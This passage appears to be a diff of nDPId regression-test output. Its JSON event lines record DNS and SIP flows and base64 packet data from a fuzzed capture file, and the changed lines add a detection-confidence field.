+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032083,"flow_last_seen":1120470032083,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470032083,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2745,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1120470032178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470032178,"pkt":"ADBUADRWAODtAW69CABFAABIO2gAAIARTOnAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhIAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470032178,"flow_last_seen":1120470032178,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470032178,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470033172,"flow_last_seen":1120470033172,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1120470033172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","l4_proto":240,"flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1120470033172,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470033172,"pkt":"ADBUADRWAODtAXO9CABFAABIamkAAIDwTOjAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp18mEDbmV0AAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1120470035175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470035175,"pkt":"ADBUADRWAODtAW69CABFAABIamoAAIARTOfAqAEiwKgBAQq6ADUANMsPhMQBAAABAAAAiwAABF9zaXAEX3VkcAQlcwBwB2JyVmp1bGEDbmV0AAAhAAE="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470035175,"flow_last_seen":1120470035175,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470035175,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":2746,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp._s?p.brvjula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28679,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1120470037178,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470037178,"pkt":"ADBUADRWAODtAW69CABFAABIamsAAIARTObAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1120470041184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470041184,"pkt":"ADBUADRWAKDtAW69CABFAABIamwAAIARTOXAqAECwKgBAQq6ADUANMsPhMQBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469956232,"flow_last_seen":1120469956233,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469956945,"flow_last_seen":1120469965955,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2740,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1120470049185,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470049185,"pkt":"ADBUAEFWAODtAW69CABFAABEam0AAIARTOjAqAECQ6gBAQq7ADUAMDM+8cUAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049185,"flow_last_seen":1120470049185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470049185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"67.168.1.1","src_port":2747,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1120470049187,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470049187,"pkt":"AODtJXMAADBUAG9WCABFAABbAABAAEARnD7AqAEBwKgBAgA1CrsARxW68cWAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049187,"flow_last_seen":1120470049187,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470049187,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2747,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470049188,"pkt":"ADBUADRWAODtAW69CABFAANSam4AAIARykzAqAECyER4URPEE0QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC9hLjCEClZpYTogU0lQLzIuMC9VRFEgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloR3ZiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCldyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2l2LmJydXJqdWxhLm5ldD47dGFnPTY0M1dlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDWwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgS05WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGNwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29uJXMAdDogPHNpcHM4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUizsT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQZyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLDE2OA4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRw32FwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zIi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtq3BWMTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":4932,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1120470049190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470049190,"pkt":"ADBUADRWAODtAW69CABFAABIam8AAIARTOLAqAECwKgBAQq8ADUANCxC\/cYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049190,"flow_last_seen":1120470049190,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470049190,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2748,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049696,"flow_last_seen":1120470049696,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049696,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1120470049696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470049696,"pkt":"ADBUADRWAODtAW69CABFAANSanAAAIARyurAqAECyER4URPEE8QDPvKbSU5WSVRFS3NpcDo5YTIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjg3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwGTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vczFwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9